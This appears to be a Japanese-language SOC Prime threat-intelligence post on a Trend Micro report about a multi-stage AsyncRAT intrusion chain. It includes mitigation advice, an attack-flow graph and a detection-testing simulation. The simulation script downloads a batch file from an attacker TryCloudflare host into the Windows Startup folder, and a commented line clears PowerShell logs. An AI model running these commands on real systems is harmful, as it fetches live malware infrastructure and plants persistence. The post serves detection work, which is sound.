SOC Prime Bias: クリティカル

14 1月 2026 18:04
newspaper icon トレンドマイクロ

MDRが明らかにしたマルチステージのAsyncRAT攻撃チェーン

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
MDRが明らかにしたマルチステージのAsyncRAT攻撃チェーン
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

このレポートは、フィッシングメールによって開始される多段階の侵入チェーンについて説明しています。これには、二重拡張子ZIPルアーを配信し、WebDAVホストのペイロードシーケンスに移行することが含まれます。オペレーターはCloudflareの無料ティアインフラストラクチャとバンドルされたPythonコンポーネントを利用してAsyncRATを被害者のエンドポイントに展開します。実行と持続性は、Windows Script Host、PowerShell、バッチスクリプトなどのネイティブなWindowsツールに依存していますが、最終段階ではexplorer.exeへのコードインジェクションが使用されます。信頼性の高いクラウドサービスを通じて配信とステージングをルーティングすることで、活動は通常のトラフィックに溶け込み、従来の境界制御を回避できます。

調査

トレンドマイクロの調査者は、ステージド配信フローと一致するテレメトリを報告しました。これは、Dropboxからの.pdf.zipアーカイブの取得、埋め込まれた.urlショートカットの実行、svchost.exeおよびrundll32.exeに起因するその後のWebDAVインタラクションを含んでいます。このチェーンは、AsyncRATシェルコードのAPCインジェクションを担当するカスタムPythonスクリプトを実行するために使用されたPython 3.14.0埋め込みファイルを展開しました。持続性は、ユーザーのスタートアップディレクトリにバッチファイルを配置することで達成されました。アナリストはまた、インフラストラクチャをサポートする複数のTryCloudflareホストを特定し、相関させました。

緩和策

二重拡張子アーカイブや予期しないZIP添付ファイルを疑わしいものとして扱うようにユーザーを訓練し、フィッシングで配信されるクラウドリンク用のフィルタリングを強化することで、露出を減らします。承認されていないクラウドトンネリングサービスへのアクセスをブロックまたは厳密に制御し、WebDAVの異常な依存度を監視します。ユーザー書き込み可能なディレクトリからのスクリプト実行を制限し、スタートアップフォルダの使用とタスクスケジュール作成に対する制御を強化します。EPR/行動検出を優先し、スクリプト駆動の実行チェーンや、正常なプロセスをターゲットにしたコード注入技術を表面化することができるものを優先します。

対応

活動が検出された場合、エンドポイントを隔離し、チェーンに関連する疑わしいプロセス(特にsvchost.exe、rundll32.exe、およびインシデントに関連する場合のpython.exe)を停止します。持続性を削除するには、スタートアップディレクトリから悪意のあるバッチアーティファクトを削除し、ダウンロードされたPythonアーカイブおよびすべてのAsyncRATコンポーネントを根絶し、追加のステージングファイルと横方向の移動を検出するための完全な法医学調査を実行します。ネットワーク制御とブロックリストを更新して、特定されたTryCloudflareドメインおよびトリアージ中に観察された関連インフラストラクチャを含めます。

“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#ccffcc classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes attack_phishing[“<b>アクション</b> – <b>T1566.001 スピアフィッシング添付</b>: 被害者が二重拡張の.pdf.urlの添付ファイルを含むフィッシングメールを受信し、Dropboxアーカイブにリンクされている。”] class attack_phishing action file_shortcut[“<b>ファイル</b> – <b>.urlショートカット</b>: PDF請求書として偽装し、悪意のあるDropboxアーカイブを指す。”] class file_shortcut file action_user_exec[“<b>アクション</b> – <b>T1204.002 ユーザー実行</b>: ユーザーがショートカットを開き、初期ダウンロードをトリガー。”] class action_user_exec action file_archive[“<b>ファイル</b> – <b>Dropboxアーカイブ</b>: PDF請求書として表示され、次の段階のペイロードを含む。”] class file_archive file action_masquerade[“<b>アクション</b> – <b>T1036.008 偽装</b>: アーカイブとショートカットは、正当なPDFファイルを模倣して疑念を回避。”] class action_masquerade action tool_wsh[“<b>ツール</b> – <b>Windows Script Host</b>: .wsh/.wsf ファイルを実行してさらなるスクリプトを取得。”] class tool_wsh tool action_script_proxy[“<b>アクション</b> – <b>T1216 システムスクリプトプロキシ実行</b>: スクリプトダウンロードのプロキシとしてWSHファイルを実行。”] class action_script_proxy action tool_rundll32[“<b>ツール</b> – <b>rundll32.exe</b>: davclnt.dll (DavSetCookie) を呼び出して、WebDAVサーバーと通信。”] class tool_rundll32 tool action_rundll32[“<b>アクション</b> – <b>T1218.011 Rundll32</b>: CloudflareがホストするWebDAVサーバーと通信するためにrundll32を使用。”] class action_rundll32 action tool_powershell[“<b>ツール</b> – <b>PowerShell</b>: Python 3.14埋め込みZIPをダウンロード、抽出し、追加のバッチファイルを取得。”] class tool_powershell tool action_powershell[“<b>アクション</b> – <b>T1059.001 PowerShell</b>: ダウンロードと抽出のためにPowerShellコマンドを実行。”] class action_powershell action action_hide[“<b>アクション</b> – <b>T1564.001 アーティファクト隠蔽</b>: ユーザーのTempディレクトリ内に隠しファイルとしてペイロードを格納。”] class action_hide action file_hidden[“<b>ファイル</b> – <b>隠しTempファイル</b>: ne.py, new.bin, a.txtが%TEMP%に配置され、隠しとしてマーク。”] class file_hidden file action_persistence[“<b>アクション</b> – <b>T1037.001 ログオン スクリプト</b>: スタートアップフォルダーにバッチファイルを配置して持続性を維持。”] class action_persistence action file_startup[“<b>ファイル</b> – <b>スタートアップバッチファイル</b>: ahke.bat および olsm.bat がユーザーのスタートアップディレクトリに配置。”] class file_startup file action_ingress[“<b>アクション</b> – <b>T1105 イングレスツール転送</b>: WebDAVサーバーから追加の悪意のあるコンポーネントを転送。”] class action_ingress action action_cloudapi[“<b>アクション</b> – <b>T1059.009 クラウドAPI</b>: trycloudflare.comドメインにHTTP/HTTPSリクエストを送り、最終ペイロードを取得。”] class action_cloudapi action action_injection[“<b>アクション</b> – <b>T1055.004 プロセスインジェクション</b>: Pythonスクリプトne.pyがAPCインジェクションを通じてexplorer.exeにAsyncRATシェルコードを注入。”] class action_injection action process_explorer[“<b>プロセス</b> – <b>explorer.exe</b>: APCシェルコードインジェクションのターゲットプロセス。”] class process_explorer process malware_asyncrat[“<b>マルウェア</b> – <b>AsyncRAT</b>: インジェクトされたシェルコードがリモートアクセストツールを確立。”] class malware_asyncrat malware action_c2[“<b>アクション</b> – <b>T1102.002 ウェブサービス</b>: AsyncRATがCloudflareインフラストラクチャとHTTPSで双方向通信。”] class action_c2 action %% Connections attack_phishing u002du002d>|配送する| file_shortcut file_shortcut u002du002d>|被害者が開き発動| action_user_exec action_user_exec u002du002d>|ダウンロード| file_archive file_archive u002du002d>|使用される| action_masquerade action_masquerade u002du002d>|実行を可能にする| tool_wsh tool_wsh u002du002d>|一部として実行される| action_script_proxy action_script_proxy u002du002d>|呼び出す| tool_rundll32 tool_rundll32 u002du002d>|呼び出す| action_rundll32 action_rundll32 u002du002d>|環境を準備する| tool_powershell tool_powershell u002du002d>|実行する| action_powershell action_powershell u002du002d>|ファイルを格納する| action_hide action_hide u002du002d>|作成する| file_hidden file_hidden u002du002d>|使用される| action_persistence action_persistence u002du002d>|配置する| file_startup file_startup u002du002d>|発動する| action_ingress action_ingress u002du002d>|より多くのコンポーネントを取得する| action_cloudapi action_cloudapi u002du002d>|ペイロードを配送する| action_injection action_injection u002du002d>|注入する| process_explorer process_explorer u002du002d>|ホストする| malware_asyncrat malware_asyncrat u002du002d>|通信する| action_c2 “

攻撃フロー

シミュレーション実行

前提条件: テレメトリー&ベースライン事前フライトチェックが合格していること。

  • 攻撃のストーリー&コマンド

    初期のPowerShellアクセスを獲得した敵は、Python実行環境をセットアップし、持続性を確立しようとしています。彼らは:

    1. 埋め込まれたPythonディストリビューションをダウンロード 直接ユーザーのローカル Temp ディレクトリを使用して Invoke‑WebRequest.
    2. 悪意のあるバッチスクリプトをダウンロード (ahke.bat) をCloudflare経由でプロキシされたドメインからユーザーのスタートアップフォルダーにダウンロードし、ログオン時に実行されるようにします。
    3. ダウンロードしたPython ZIPを実行 (省略のため詳細は省略)して、さらなるペイロードを実行します。

    これらのステップは、Sigmaルールによって一致する正確なコマンド文字列を生成し、 iwr … -OutFile … パターンを持つPowerShellスクリプトブロックログを生成します。

  • 回帰テストスクリプト

    # -------------------------------------------------
# PowerShellによるAsyncRAT環境設定のシミュレーション
# -------------------------------------------------

# 1. ユーザーテンプフォルダにPython埋め込みZIPをダウンロード
$pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
$pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
iwr $pythonUrl -OutFile $pythonDest

# 2. 持続性のための悪意のあるバッチファイルをスタートアップにダウンロード
$batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
$batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
iwr $batUrl -OutFile $batDest

# 3. (オプション)持続性を実証するためにバッチの実行をトリガー
# Start-Process -FilePath $batDest -WindowStyle Hidden
# -------------------------------------------------

  • クリーンアップコマンド

    # ダウンロードされたアーティファクトを削除
Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue

# オプションでPowerShellスクリプトブロックログをクリア(管理者権限が必要)
# Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加